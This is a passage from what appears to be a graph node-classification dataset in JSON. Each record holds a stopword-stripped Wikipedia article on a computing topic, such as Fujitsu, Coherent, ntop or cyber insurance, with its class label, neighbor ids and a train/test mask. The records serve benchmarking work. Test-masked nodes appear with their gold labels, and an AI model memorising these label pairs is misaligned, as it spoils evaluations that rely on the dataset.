tentative schedule subscribing private placement increase fdk capital april 1 2009 fujitsu agreed acquire siemens stake fujitsu siemens computers approximately eur450m fujitsu siemens computers subsequently renamed fujitsu technology solutions april 2009 fujitsu acquired australian software company supply chain consulting 48 million deal weeks purchasing telstra subsidiary kaz 200 million concerning net loss forecast amounted 95 billion yen year ending march 2013 february 2013 fujitsu announced cut 5,000 jobs 3,000 jobs japan rest overseas 170,000 employees fujitsu also merge large scale integrated chip business panasonic corporation 2015 fujitsu celebrates 80 years since establishment side currently embarked upon fujitsu 2015 world tour included 15 major cities globally visited 10,000 professionals fujitsu presenting take future hyper connectivity human centric computing april 2015 glovia international renamed fujitsu glovia inc november 2015 fujitsu limited vmware announced new areas collaboration empower customers flexible secure cloud technologies also acquired usharesoft provides enterprise-class application delivery software automating build migration governance applications multi-cloud environments january 2016 fujitsu network communications inc. announced new suite layered products advance software-defined networking sdn carriers service providers cloud builders virtuora nc based open standards described fujitsu suite standards-based multi-layered multi-vendor network automation virtualization products hands-on hardened largest global service providers fujitsu laboratories fujitsu research development division 1,300 employees capital 5 billion yen run tatsuo tomita 2012 fujitsu announced developed new technology non-3d camera phones technology allow camera phones take 3d photos fujitsu electronics europe gmbh entered market global distributor 1 january 2016 fujitsu consulting consulting services arm fujitsu group providing information technology consulting implementation management services fujitsu consulting founded 1973 montreal quebec canada original name dmr acronym three founder names pierre ducros serge meilleur alain roy next decade company established presence throughout quebec canada extending reach international markets nearly thirty years dmr consulting grew become international consulting firm changing name fujitsu consulting 2002 acquired fujitsu ltd. fujitsu operates division company india resulting acquisition north america-based company rapidigm offshore divisions noida pune hyderabad chennai bangalore pune head office fujitsu consulting india launched second 10 million development center noida october 2007 year starting operation country following expansion plan fujitsu consulting india launched fourth development center bengaluru nov 2011 fujitsu ltd. 42 shareholding fujitsu general manufactures markets various air conditioning units humidity control solutions general fujitsu brands india fujitsu general joint venture eta-ascon manufactures sells air conditioners general brand pfu limited headquartered ishikawa japan wholly owned subsidiary fujitsu limited pfu limited established 1960 approximately 4,600 employees globally 2013 turned 126.4 billion yen 1.2 billion usd pfu manufactures interactive kiosks keyboards network security hardware embedded computers imaging products document scanners pfu fujitsu brand addition hardware pfu also produce desktop enterprise document capture software document management software products pfu overseas sales marketing offices germany pfu imaging solutions europe limited italy pfu imaging solutions europe limited united kingdom pfu imaging solutions europe limited united states america fujitsu computer products america inc pfu limited responsible design development manufacture sales support document scanners sold fujitsu brand fujitsu market leaders professional document scanners best selling fi-series scansnap scanpartner product families well paperstream ip paperstream capture scansnap manager cardminder magic desktop rack2filer software products fujitsu glovia wholly owned subsidiary fujitsu ltd. discrete manufacturing enterprise resource planning software vendor based el segundo california international operations netherlands japan united kingdom company offers on-premise cloud-based erp manufacturing software glovia g2 brand software service saas brand glovia om company established 1970 xerox computer services developed inventory manufacturing financial applications fujitsu acquired 30 percent renamed glovia international 1997 remaining 70 percent stake 2000 fujitsu client computing limited fccl headquartered kawasaki kanagawa city company founded division fujitsu responsible research development design manufacturing sales consumer pc products formerly wholly owned subsidiary november 2017 fccl spun joint venture lenovo development bank japan dbj new company retains name fujitsu still responsible sales support products however lenovo owns majority stake 51 fujitsu retains 44 remaining 5 stake held dbj fujitsu computing product lines include may 2011 fujitsu decided enter mobile phone space microsoft announcing plans fujitsu would release windows phone devices fujitsu primergy eternus distributed tritech distribution limited hong kong lifebook amilo fujitsu range notebook computers tablet pcs fujitsu offers public cloud service delivered data centers japan australia singapore united states united kingdom germany based global cloud platform strategy announced 2010 platform delivers infrastructure-as-a-service iaas – virtual information communication technology ict infrastructure servers storage functionality – fujitsu data centers japan service offered on-demand virtual system service oviss launched globally fujitsu global cloud platform/s5 fgcp/s5 since july 2013 service called iaas trusted public s5 globally service operated fujitsu data centers located australia singapore united states united kingdom germany japan fujitsu also launched windows azure powered global cloud platform partnership microsoft offering delivering platform-as-a-service paas known fgcp/a5 japan since renamed fujitsu cloud paas a5 windows azure operated fujitsu data center japan offers set application development frameworks microsoft .net java php data storage capabilities consistent windows azure platform provided microsoft basic service consists compute storage microsoft sql azure windows azure appfabric technologies service bus access control service options inter-operating services covering implementation migration applications system building systems operation support fujitsu acquired runmyprocess april 2013 cloud-based integration platform-as-a-service paas specialized workflow automation business application development fujitsu launched cloud service k5 offering availability zones currently deployed japan uk deployments progressing across europe cloud service k5 based open-standard technologies consumed public cloud virtual private cloud private cloud fujitsu offers local cloud platforms australia provide ability rely domestic data centers keep sensitive financial data local jurisdiction compliance standards fujitsu produces sparc-compliant cpu sparclite venus 128 gflop sparc64 viiifx model included k computer world fastest supercomputer june 2011 rating 8 petaflops november 2011 k became first computer top 10 petaflops september 2011 fujitsu fr fr-v arm architecture microprocessors widely used additionally asics application-specific standard products assp like milbeaut customer variants named nikon expeed acquired spansion 2013 old slogan possibilities infinite found company logo major advertisements ties small logo letters j word fujitsu smaller logo represents symbol infinity april 2010 fujitsu process rolling new slogan focused entering partnerships customers retiring possibilities infinite tagline new slogan shaping tomorrow fujitsu reports notebook tablet pcs released globally comply latest energy star standard greenpeace cool leaderboard february 2012 evaluates global companies leadership fight stop climate change ranks fujitsu 3rd 21 leading manufacturers strength well-developed case study data solutions transparent methodology standing leaderboard scoring high future savings goal criterion",
    "neighbors": [
      11271,
      3594,
      8714,
      5137,
      530,
      7702,
      10273,
      36,
      4132,
      9766,
      8237,
      10288,
      7218,
      3123,
      10802,
      10303,
      8772,
      4679,
      4172,
      8268,
      7246,
      7248,
      597,
      10837,
      8792,
      6748,
      1638,
      8301,
      1141,
      630,
      127,
      2689,
      2179,
      6276,
      9351,
      9863,
      6282,
      11405,
      8863,
      6818,
      8355,
      3238,
      9894,
      3753,
      5290,
      1707,
      9391,
      6834,
      4285,
      1216,
      9920,
      8900,
      199,
      1738,
      6353,
      725,
      2273,
      9443,
      4331,
      5356,
      9964,
      9455,
      1776,
      758,
      3323,
      1787,
      3328,
      5377,
      265,
      6926,
      8975,
      1809,
      5905,
      11545,
      3866,
      284,
      1833,
      3883,
      9006,
      10030,
      835,
      10053,
      3911,
      2383,
      2895,
      4444,
      1376,
      7008,
      3938,
      9057,
      1380,
      3431,
      6503,
      6505,
      4463,
      2416,
      11631,
      1907,
      7028,
      1399,
      1400,
      3449,
      10615,
      10108,
      9090,
      3459,
      7053,
      5523,
      7063,
      7068,
      10658,
      5027,
      5028,
      9126,
      424,
      4011,
      9137,
      4530,
      2995,
      7617,
      9665,
      1480,
      6090,
      9166,
      467,
      981,
      7638,
      1503,
      3560,
      499,
      6647,
      10235,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 9138,
    "label": 9,
    "text": "EGL_(programming_language):egl programming language egl enterprise generation language originally developed ibm available edt egl development tools open source project eclipse public license epl programming technology designed meet challenges modern multi-platform application development providing common language programming model across languages frameworks runtime platforms language borrows concepts familiar anyone using statically typed languages like java cobol c etc however borrows concept stereotype unified modeling language uml typically found statically typed programming languages nutshell egl higher-level universal application development language egl similar syntax common languages learned application developers similar previous programming background egl application development abstractions shield programmers technical interfaces systems middleware allowing focus building business functionality egl applications services written tested debugged egl source level satisfactorily functionally tested compiled cobol java javascript code support deployment business applications run following environments egl program part generatable logic part one entry point program part contains main function represents logic runs program start program include functions access functions outside program function main invoke functions program functions composed set egl statements variables constants egl record part defines set data elements example record name customerrecord defined 6 fields egl specialized type record called sqlrecord used exchange data relational database egl service part contains public functions meant accessed applications systems example service two functions defined main component rich ui application rich ui handler part parts generated javascript december 2008 ibm introduced new technology egl rich ui simplify creation web 2.0-style rich internet applications technology simplifies development hiding complexities ajax javascript rest soap developer enables focus business requirement underlying technologies egl programming tools available eclipse-based commercial product rational business developer also egl edition rational developer system z. egl target language modernization legacy applications language semantics affinity procedural languages legacy 4th generation languages tools searching large egl code bases comparing individual egl files changes detecting duplicated code available semantic designs",
    "neighbors": [
      6850,
      3462,
      1802,
      10474,
      5677,
      6797,
      5872,
      11024,
      1363,
      1235,
      5078,
      823,
      2168,
      10486,
      2045,
      3966
    ],
    "mask": "Test"
  },
  {
    "node_id": 9139,
    "label": 2,
    "text": "IBM_DPPX:ibm dppx distributed processing programming executive discontinued operating system introduced ibm pre-installed ibm 8100 later ported es/9370 dppx written programming language distributed systems pl/ds pl/i-derived systems programming language similar pl/s systems programming language used mvs vm part dppx/370 development process developing pl/ds 2 language based pl/ds changes necessitated changed instruction set pl/ds like pl/s high-level language encourages significant use inline assembly user interfaces e.g. command line dppx clean easy use syntax commands whole concept ideas dppx looked straightforward consistent command line online help etc every aspect documented online rich set well organized printed manuals dppx system could operated truly operator-less remote hence distributed part name one benefit clean design programs could written modern dialects cobol dialogs could developed interactively addition expected functions operating system dppx included several functions allowed remote administration distributed host command facility dhcf allowed host command facility hcf user mainframe log either full-screen mode line mode execute commands though logged locally distributed systems network node executive dsnx allowed distributed systems executive dsx later netview/dm job manage files separate additional products also available including cobol fortran compilers distributed transaction management system dtms command facilities extensions cfe provided easy support full-screen applications data stream capability dsc allow dppx users log applications mainframe performance tool pt",
    "neighbors": [
      2179,
      4996,
      6148,
      10883,
      7053,
      9619,
      11673,
      2168,
      6557,
      3359,
      10273,
      6442,
      7983,
      7217,
      6325,
      8502,
      573,
      1219,
      964,
      6342,
      8262,
      863,
      3938,
      5603,
      868,
      3429,
      5220,
      6503,
      9829,
      375,
      3960,
      3323,
      2172,
      2813
    ],
    "mask": "None"
  },
  {
    "node_id": 9140,
    "label": 2,
    "text": "Application_Packaging_Standard:application packaging standard application packaging standard aps standard defines technology integrating application software hosting platforms integration application hosting platforms implemented creating aps package application aps package deployment creates aps application aps involves three types participants integration process aps went two stages aps 1 emerged way creating predominantly two types aps packages respectively two types aps applications aps 2 added flexibility integrate applications hosting platforms also aps 2 makes possible create custom user interface hosting platforms managing integrated applications following web hosting platforms allow installations aps packages aps packages available download application catalog isvs make applications publicly available uploading catalog",
    "neighbors": [
      467,
      4309
    ],
    "mask": "None"
  },
  {
    "node_id": 9141,
    "label": 2,
    "text": "Coherent_(operating_system):coherent operating system coherent clone unix operating system ibm pc compatibles microcomputers developed sold now-defunct mark williams company mwc historically operating system proprietary product became open source 2015 released 3-clause bsd license coherent unix mark williams company rights either unix trademark t/bell labs source code early years existence mwc received visit delegation looking determine whether mwc infringing unix property delegation included dennis ritchie concluded hard believe coherent basic applications created without considerable study os code details applications however also stated much operating system written alumni university waterloo tom duff dave conroy randall howard johann george trevor john thompson significant contributions also made people nigel bree auckland new zealand later author ghost coherent originally written pdp-11 range minicomputers 1980 ported various early 1980s microcomputer systems including ibm pc compatibles machines based zilog z8000 motorola 68000 initially sold oems starting 1983 available consumer market mwc directly point coherent 2.3 offered roughly functionality version 7 unix pc hardware including nroff formatter bsd extensions offered competing unix/clone vendors compared competitors small system distributed seven double-sided floppy disks costing us 500 license byte 1984 called coherent highly compatible unix version 7 lookalike 1985 criticized difficulty installation stated unix clone coherent amazingly complete ... easy port programs ... price 495 bargain early 1990s reviews coherent pointed system much smaller contemporary unix offerings well less expensive us 99.95 lacking functionality software support pc magazine called coherent 3.0 time capsule captured state unix late 1970s without support mice lans scsi disks good learning basic unix programming business automation review auug newsletter positive favorably comparing coherent mks toolkit minix xenix suggesting might fill niche low-end training platform coherent able run intel-based pcs intel 8088 286 386 486 processors coherent version 3 intel-based pcs required least 286 coherent version 4 intel-based pcs required least 386 like true unix coherent able multitask support multiple users version 4 released 1992 coherent also support x11 mgr windowing systems later versions coherent version 4 higher supported features common modern unix-like systems including version microemacs access dos fat16 file systems optimizing c compiler modified version taylor uucp final releases coherent also fully supported ibcs coff binary standard allowed binary compatibility sco unix applications including wordperfect lotus 1-2-3 several microsoft applications including quickbasic microsoft word multiplan last 386 versions supported virtual memory demand paging zilog z8000 port coherent also used canceled commodore 900 system 1983 ncsc subsidiary nixdorf announced port coherent ibm mainframes form unix compatibility subsystem ibm dos/vs dos/vse nixdorf edos/vs edos/vse operating systems known programmer work station/vse-advanced functions pws/vse-af short mark williams company closed 1995 january 3 2015 coherent sources released 3-clause bsd license",
    "neighbors": [
      2560,
      7682,
      6675,
      8725,
      1561,
      9762,
      7224,
      9784,
      2120,
      6218,
      2132,
      86,
      11363,
      7269,
      6760,
      9320,
      5236,
      633,
      3197,
      640,
      2179,
      132,
      6787,
      6297,
      671,
      7848,
      3241,
      3248,
      10436,
      1247,
      6369,
      9444,
      10469,
      11501,
      5363,
      9972,
      2301,
      11013,
      6412,
      787,
      11539,
      5397,
      3350,
      1304,
      8991,
      7460,
      2345,
      6445,
      7983,
      823,
      7483,
      9027,
      8020,
      11608,
      8553,
      5492,
      2424,
      5506,
      11145,
      7566,
      414,
      3487,
      1952,
      3488,
      6049,
      5036,
      10156,
      1971,
      2995,
      9151,
      470,
      6624,
      1508,
      4076,
      8687,
      6129,
      499,
      2035,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 9142,
    "label": 4,
    "text": "Ntop:ntop ntop stylized ntop computer software probes computer network show network use way similar program top processes interactive mode displays network status user terminal web mode acts web server creating html dump network status supports netflow-sflow emitter-collector hypertext transfer protocol http based client interface creating ntop-centric monitoring applications rrdtool rrd persistently storing traffic statistics ntop available unix win32-based platforms developed luca deri italian research scientist network manager university pisa common usage linux system start ntop daemon /etc/init.d/ntopd start one use web interface ntop via visiting nowiki http //127.0.0.1:3000 /nowiki provided loopback device started /etc/init.d/net.lo start listening port ntop 3000 look -w option ps aux grep ntop",
    "neighbors": [
      225,
      10788,
      4423,
      4797,
      9544,
      1580,
      5612,
      6797,
      10417,
      5492,
      823,
      4762,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 9143,
    "label": 1,
    "text": "Lossless-Join_Decomposition:lossless-join decomposition computer science concept lossless-join decomposition central removing redundancy safely databases preserving original data also called nonadditive decompose relation formula_1 relations formula_2 lossless-join natural join two smaller relations yields back original relation .e formula_3 formula_1 split formula_5 formula_6 decomposition lossless least one two following criteria met projecting formula_5 formula_6 joining back results relation started let formula_1 relation schema let set functional dependencies formula_1 let formula_5 formula_6 form decomposition formula_1 decomposition lossless-join decomposition formula_1 least one following functional dependencies stands closure every attribute attribute sets",
    "neighbors": [
      4281,
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 9144,
    "label": 9,
    "text": "Lucee:lucee lucee open source software implements lightweight dynamically-typed scripting language java virtual machine jvm facilitating rapid development web applications compile directly java bytecode lucee compatible contemporary cfml script tag language variants provides configurable support legacy cfml lucee language supports multiple development paradigms including object orientation inheritance interfaces functional constructs like higher-order functions closures codice_1 codice_2 lucee created lucee association switzerland forked version 4.2 railo server developed lucee built-in support microsoft sql server mysql oracle postgresql many popular relational database engines lucee also supports database jdbc driver available lucee built-in support calling consuming data returned existing web services along ability easily configure expose web services consumed lucee supports three types web services lucee built-in support object relational mapping orm framework hibernate facilitating hibernate usage lucee code without complex explicit configuration lucee built-in support multiple caching systems including infinispan ehcache memcached extended additional systems cache implementations configured within lucee server used within application—both explicitly implicitly—for caching database results function call results external http request results serialized session storage flexible backing store in-process ram-based file-system abstraction lucee supports multiple virtual file systems—built-in abstractions various local remote resources—including zip http ftp s3 ram allow lucee server developer treat access abstracted resource manner local file system lucee derived coldfusion markup language cfml therefore support tag-based script-based versions cfml examples assign string hello world value variable codice_3 output value response buffer typically display web browser lucee project led lucee association switzerland non-profit swiss association association consists members help fund guide project project also enterprise corporate individual supporters supporters members lucee association help fund promote project exchange certain benefits",
    "neighbors": [
      2946,
      6277,
      3469,
      9618,
      148,
      11030,
      4507,
      4512,
      6819,
      8739,
      10020,
      5677,
      11693,
      7983,
      4529,
      7862,
      3895,
      5048,
      2234,
      7100,
      11201,
      5314,
      9666,
      7364,
      9286,
      6860,
      8539,
      10340,
      102,
      7274,
      7022,
      5872,
      10994,
      10486,
      9467
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9145,
    "label": 4,
    "text": "Cyber_insurance:cyber insurance cyber-insurance insurance product used protect businesses individual users internet-based risks generally risks relating information technology infrastructure activities risks nature typically excluded traditional commercial general liability policies least specifically defined traditional insurance products coverage provided cyber-insurance policies may include first-party coverage losses data destruction extortion theft hacking denial service attacks liability coverage indemnifying companies losses others caused example errors omissions failure safeguard data defamation benefits including regular security-audit post-incident public relations investigative expenses criminal reward funds cyber-insurance market many countries relatively small compared insurance products overall impact emerging cyber threats difficult quantify impact people businesses cyber threats also relatively broad compared scope protection provided insurance products insurance companies continue develop services insurers pay cyber-losses cyber threats develop change insurance products increasingly purchased alongside existing security services indeed underwriting criteria insurers offer cyber-insurance products also early development underwriters actively partnering security companies develop products well directly improving security cyber-insurance enormously beneficial event large-scale security breach insurance provides smooth funding mechanism recovery major losses helping businesses return normal reducing need government assistance finally insurance allows cyber-security risks distributed fairly cost premiums commensurate size expected loss risks avoids potentially dangerous concentrations risk also preventing free-riding information technology inherent facet virtually modern businesses requirement separate product exists deliberate scoping exercise excluded theft damage associated modern technologies existing product lines bruce schneier postulated existing insurance practices tend follow either flood fire model however cyber events n't appear modeled either event types led situation scope cyber insurance restricted decrease risk underwriters compounding paucity data relating actual damage correlated type event lack standards associated classification events lack evidence associated efficacy industry best practices insurance relies upon sound actuarial data largely static background risk given n't exist present unlikely either buyers products achieve value outcomes desire.this view market reflected current market state standard exclusions result situation insurer could argue apply almost data breach early works 1990s focused general merits cyber-insurance protocols borrowed digital cash enable risk reallocation distributed systems late 1990s business perspective information security became prominent visions cyber-insurance risk management tool formulated although roots 1980s looked promising battered events y2k 9/11 attacks market cyber-insurance failed thrive remained niche unusual demands coverage tightly limited clients include smbs small medium businesses need insurance qualify tenders community banks small hedge risks online banking operations first least one first cyber liability policies call developed lloyd london market 2000 policy spearheaded keith daniels rob hamesfahr attorneys chicago il law firm blatt hammesfahr eaton working closely ian hacker lloyd underwriter ted doolittle kinsey carpenter brokers kinsey carpenter san francisco ca insurance broker policy provided third-party coverage along business interruption coverage early days thought big risk would company negligently transmit virus could infect companies systems would bring suit original company well business interruption policy one first well include first-party third-party coverages form errors omissions likely happened suits organizations basis proven rare focus forms developed since 2000 business interruption payment fines penalties credit monitoring costs public relations costs cost restoring rebuilding private data continue expand evolve today addition technology errors omissions policies sold third-party coverage organizations programmers technology installers could get sued advice product fails satisfactory clients early entrants cyber market included american international group aig chubb today 80 companies competing cyber market even 2002 conservative forecast predicted global market cyber-insurance worth 2.5 billion 2005 turned five times higher size market 2008 overall relative terms market cyber-insurance shrank internet economy grew practice number obstacles prevented market cyber-insurance achieving maturity absence reliable actuarial data compute insurance premiums lack awareness among decision-makers contributing little demand well legal procedural hurdles identified first generation cyber-insurance literature 2005 latter aspect may cause frustration claiming compensation damages furthermore entities considering cyber-insurance must undergo series often invasive security evaluation procedures revealing infrastructures policies meanwhile witnessing thousands vulnerabilities millions attacks substantial improvement defining security standards computer forensics calls question validity factors causally explain lack insurance market infrastructure users services offered computer networks today subject wide variety risks posed threats include distributed denial service attacks intrusions various kinds eavesdropping hacking phishing worms viruses spams etc order counter risk posed threats network users traditionally resorted antivirus anti-spam software firewalls intrusion-detection systems idss add-ons reduce likelihood affected threats practice large industry companies like symantec mcafee etc well considerable research efforts currently centered around developing deploying tools techniques detect threats anomalies order protect cyber infrastructure users resulting negative impact anomalies spite improvements risk protection techniques last decade due hardware software cryptographic methodologies impossible achieve perfect/near-perfect cyber-security protection impossibility arises due number reasons view above-mentioned inevitable barriers near 100 risk mitigation need arises alternative methods risk management cyberspace highlight importance improving current state cyber-security us president barack obama issued cyber-security executive order february 2013 emphasizes need reduce cyber-threats resilient regard security researchers recent past identified cyber-insurance potential tool effective risk management cyber-insurance risk management technique via network user risks transferred insurance company return fee i.e. insurance premium examples potential cyber-insurers might include isp cloud provider traditional insurance organizations proponents cyber-insurance believe cyber-insurance would lead design insurance contracts would shift appropriate amounts self-defense liability clients thereby making cyberspace robust term ‘ self-defense implies efforts network user secure system technical solutions anti-virus anti-spam software firewalls using secure operating systems etc cyber-insurance also potential market solution align economic incentives cyber-insurers users individuals/organizations policy makers security software vendors i.e. cyber-insurers earn profit appropriately pricing premiums network users seek hedge potential losses jointly buying insurance investing self-defense mechanisms policy makers would ensure increase overall network security security software vendors could experience increase product sales via forming alliances cyber-insurers key area manage risk establish acceptable risk organization practicing 'duty care helps protect interested parties executives regulators judges public affected risks duty care risk analysis standard docra provides practices principles help balance compliance security business objectives developing security controls consequently 2005 “ second generation cyber-insurance literature emerged targeting risk management current cyber-networks authors literature link market failure fundamental properties information technology specially correlated risk information asymmetries insurers insureds inter-dependencies information asymmetry significant negative effect insurance environments typical considerations include inability distinguish users different high low risk types i.e. so-called adverse selection problem well users undertaking actions adversely affect loss probabilities insurance contract signed i.e. so-called moral hazard problem challenge due interdependent correlated nature cyber-risks particular cyber-insurance differentiates traditional insurance scenarios e.g. car health insurance former large distributed system internet risks span large set nodes correlated thus user investments security counter risks generate positive externalities users network aim cyber-insurance enable individual users internalize externalities network user optimally invests security solutions thereby alleviating moral hazard improving network security traditional insurance scenarios risk span quite small sometimes spans one two entities uncorrelated thus internalizing externalities generated user investments safety much easier like insurance policies cyber insurance typically includes war exclusion clause explicitly excluding damage acts war majority cyber insurance claims relate simple criminal behaviour increasingly companies likely fall victim cyberwarfare attacks nation states terrorist organisations whether specifically targeted simply collateral damage us uk governments characterised notpetya attack russian military cyber-attack insurers arguing cover events current work regarding existence cyber-insurance markets among important ones works lelarge bolot ii pal golubchik psounis hui iii johnson et al. iv shetty et al works first comment free riding behavior internet users without presence cyber-insurance works lelarge et al shetty et al present benefits cyber-insurance incentivizing internet users invest appropriately security however works address restricted market types lelarge et al model information asymmetry work shetty et al prove cyber-insurance markets inefficient conditions information asymmetry johnson et al discuss role joint existence self-insurance market insurance adoption different types insurance users recent work pal et al prove inefficiency cyber-insurance markets conditions partial information asymmetry correlated risks show existence efficient markets regulated unregulated premium discrimination 2014 90 cyber-insurance premium volume covering exposure united states although least 50 insurance companies cyber-insurance product offerings actual writing concentrated within group five underwriters many insurance companies hesitant enter coverage market sound actuarial data cyber exposure non-existent hampering development actuarial data inadequate disclosure regarding cyber attacks affected significant malware incident 2017 however reckitt benckiser released information much cyberattack would impact financial performance leading analysts believe trend companies transparent data cyber incidents cyber insurance premiums expected grow around 2 billion 2015 estimated 20 billion 2025 insurers reinsurers continuing refine underwriting requirements market immaturity lack standardization two reasons underwriting cyber products today make interesting place insurance world insurance marketplace ’ trying reach standard accommodate needs today ’ insured also time rapidly developing exposure landscape capacity available",
    "neighbors": [
      2213,
      2558,
      8998,
      9319,
      10309,
      6762,
      2926,
      9688,
      2041,
      7739,
      4956,
      5245,
      2750
    ],
    "mask": "None"
  },
  {
    "node_id": 9146,
    "label": 5,
    "text": "TCP/IP_stack_fingerprinting:tcp/ip stack fingerprinting tcp/ip stack fingerprinting passive collection configuration attributes remote device standard layer 4 network communications combination parameters may used infer remote machine operating system aka os fingerprinting incorporated device fingerprint certain parameters within tcp protocol definition left implementation different operating systems different versions operating system set different defaults values collecting examining values one may differentiate among various operating systems implementations tcp/ip tcp/ip fields may vary include following values may combined form 67-bit signature fingerprint target machine inspecting initial ttl window size fields often enough order successfully identify operating system eases task performing manual os fingerprinting protection fingerprint doorway attack achieved limiting type amount traffic defensive system responds examples include blocking address masks timestamps outgoing icmp control-message traffic blocking icmp echo replies security tool alert potential fingerprinting match another machine fingerprinter configuration detecting fingerprint disallowing tcp/ip fingerprinting provides protection vulnerability scanners looking target machines running certain operating system fingerprinting facilitates attacks blocking icmp messages one array defenses required full protection attacks targeting icmp datagram obfuscator running top ip internet layer acts scrubbing tool confuse tcp/ip fingerprinting data exist ms windows linux freebsd list tcp/os fingerprinting tools",
    "neighbors": [
      3872,
      3486,
      2084,
      6345,
      11434,
      684,
      10924,
      7031,
      5490,
      2739,
      1429,
      4085,
      823,
      11319,
      5402,
      3006
    ],
    "mask": "Test"
  },
  {
    "node_id": 9147,
    "label": 1,
    "text": "Associative_model_of_data:associative model data associative model data data model database systems data models relational model object data model record-based models involve encompassing attributes thing car record structure attributes might registration colour make model etc associative model everything “ discrete independent existence ” modeled entity relationships modeled associations granularity data represented similar schemes presented chen entity-relationship model bracchi paolini pelagatti binary relations senko entity set model number claims made model simon williams book associative model data distinguish associative model traditional models associative database management system data metadata data data stored two types things associative model would use two structures store piece information flight ba1234 arrived london heathrow 12-dec-05 10:25 seven items four nouns flight ba1234 london heathrow 12-dec-05 10:25 three verbs arrived three links needed store data first link flight ba1234 source arrived verb london heathrow target second link first link source verb item 12-dec-05 target link begins ellipsis ... previous link source third link second link source verb 10:25 target alternative way write thing using parentheses associative database may regarded comprising two tables one items one links item link arbitrary number called surrogate identifier",
    "neighbors": [
      2688,
      5632,
      8201,
      9631,
      1697,
      9397,
      4155,
      7868,
      11324,
      2369,
      11457,
      6085,
      2512,
      2901,
      7767,
      11098,
      7650,
      8291,
      9828,
      10471,
      1146,
      6395,
      3196
    ],
    "mask": "Test"
  },
  {
    "node_id": 9148,
    "label": 2,
    "text": "Georg_C._F._Greve:georg c. f. greve georg c. f. greve born 10 march 1973 helgoland germany software developer physicist author currently co-founder president vereign working technology politics since founded free software foundation europe fsfe 2001 greve working full-time president fsfe since early 2001 june 2009 handed presidency fsfe karsten gerloff responsibilities fsfe included coordination general assembly supporting local representatives work working political legal issues well projects giving speeches informing journalists spread knowledge free software addition georg greve also worked consultant representing google ooxml standardisation process iso project reviewer european commission greve married currently lives switzerland 2010 greve awarded cross merit ribbon federal republic germany verdienstkreuz bande greve degree physics biophysics physical oceanography astronomy minor fields study computer science department university hamburg interdisciplinary diploma thesis written field nanotechnology scanning probe microscopy greve first software development 12 years old first publication program professional journal 1992 partly financed studies managed software development evaluate squid-sensor data biomagnetometic laboratory university medical center hamburg-eppendorf hamburg germany 1993 came across free software gnu project linux 1998 european speaker gnu project began writing brave gnu world monthly column free computer software featuring interesting gnu projects month published internet many ten languages international printed magazines including german linux-magazin name brave gnu world reference aldous huxley novel brave new world early 2001 initiated free software foundation europe fsfe fsf europe first free software foundation outside united states america transnational free software foundation greve invited expert “ commission intellectual property rights ” uk government represented coordination circle german civil society first phase united nations un world summit information society wsis part german governmental delegation also networked civil society working groups european level well thematic working group patents copyrights trademarks pct free software 2010 2017 served ceo well president later member board kolab systems ag küsnacht switzerland developers kolab server late 2017 greve known advocate open source co-founded company called vereign enable authentic communication blockchain federated networks claus h. bressmer",
    "neighbors": [
      2050,
      1028,
      2180,
      4230,
      11654,
      9865,
      4493,
      1939,
      2332,
      10012,
      3744,
      802,
      3618,
      4265,
      11180,
      6962,
      5555,
      823,
      2233,
      10687,
      8258,
      10822,
      5703,
      5833,
      4561,
      8147,
      1112,
      3674,
      2010,
      7904,
      8673,
      9696,
      10464,
      3817,
      9579,
      1007,
      8304,
      1394,
      8436,
      3068,
      5759
    ],
    "mask": "Test"
  },
  {
    "node_id": 9149,
    "label": 0,
    "text": "Mindnet:mindnet mindnet name several automatically acquired databases lexico-semantic relations developed members natural language processing group microsoft research 1990s considered one world largest lexicons databases could make automatic semantic descriptions along wordnet framenet hownet integrated linguistic database particularly distinguished wordnet way created automatically dictionary mindnet designed continuously extended first built longman dictionary contemporary english ldoce later included american heritage full text microsoft encarta system analyze linguistic representations arbitrary text underlying technology based parser used microsoft word grammar checker deployed natural language query engine microsoft encarta 99 encyclopedia",
    "neighbors": [
      416,
      5639
    ],
    "mask": "Test"
  },
  {
    "node_id": 9150,
    "label": 8,
    "text": "Cwm_(software):cwm software cwm pronounced koom general-purpose data processing software semantic web similar sed awk text files xslt xml forward chaining semantic reasoner used querying checking transforming filtering information core language rdf extended include rules use rdf/xml rdf/n3 see notation3 primer serializations cwm perform following tasks cwm written python 2000-10 onwards tim berners-lee dan connolly w3c",
    "neighbors": [
      5632,
      9223,
      9735,
      8554,
      10452,
      502,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 9151,
    "label": 2,
    "text": "Berkeley_Software_Distribution:berkeley software distribution berkeley software distribution bsd operating system based research unix developed distributed computer systems research group csrg university california berkeley today bsd often refers descendants freebsd openbsd netbsd dragonfly bsd bsd initially called berkeley unix based source code original unix developed bell labs 1980s bsd widely adopted workstation vendors form proprietary unix variants dec ultrix sun microsystems sunos due permissive licensing familiarity many technology company founders engineers although proprietary bsd derivatives largely superseded 1990s unix svr4 osf/1 later releases provided basis several open-source operating systems including freebsd openbsd netbsd dragonfly bsd darwin trueos turn used proprietary operating systems including apple macos ios derived microsoft windows used part tcp/ip code earliest distributions unix bell labs 1970s included source code operating system allowing researchers universities modify extend unix operating system arrived berkeley 1974 request computer science professor bob fabry program committee symposium operating systems principles unix first presented pdp-11/45 bought run system budgetary reasons machine shared mathematics statistics groups berkeley used rsts unix ran machine eight hours per day sometimes day sometimes night larger pdp-11/70 installed berkeley following year using money ingres database project 1975 ken thompson took sabbatical bell labs came berkeley visiting professor helped install version 6 unix started working pascal implementation system graduate students chuck haley bill joy improved thompson pascal implemented improved text editor ex universities became interested software berkeley 1977 joy started compiling first berkeley software distribution 1bsd released march 9 1978 1bsd add-on version 6 unix rather complete operating system right thirty copies sent second berkeley software distribution 2bsd released may 1979 included updated versions 1bsd software well two new programs joy persist unix systems day vi text editor visual version ex c shell 75 copies 2bsd sent bill joy vax computer installed berkeley 1978 port unix vax architecture unix/32v take advantage vax virtual memory capabilities kernel 32v largely rewritten berkeley students include virtual memory implementation complete operating system including new kernel ports 2bsd utilities vax utilities 32v released 3bsd end 1979 3bsd also alternatively called virtual vax/unix vmunix virtual memory unix bsd kernel images normally called codice_1 4.4bsd 4.3bsd released june 1986 determined bsd would move away aging vax platform power 6/32 platform codenamed tahoe developed computer consoles inc. seemed promising time abandoned developers shortly thereafter nonetheless 4.3bsd-tahoe port june 1988 proved valuable led separation machine-dependent machine-independent code bsd would improve system future portability addition portability csrg worked implementation 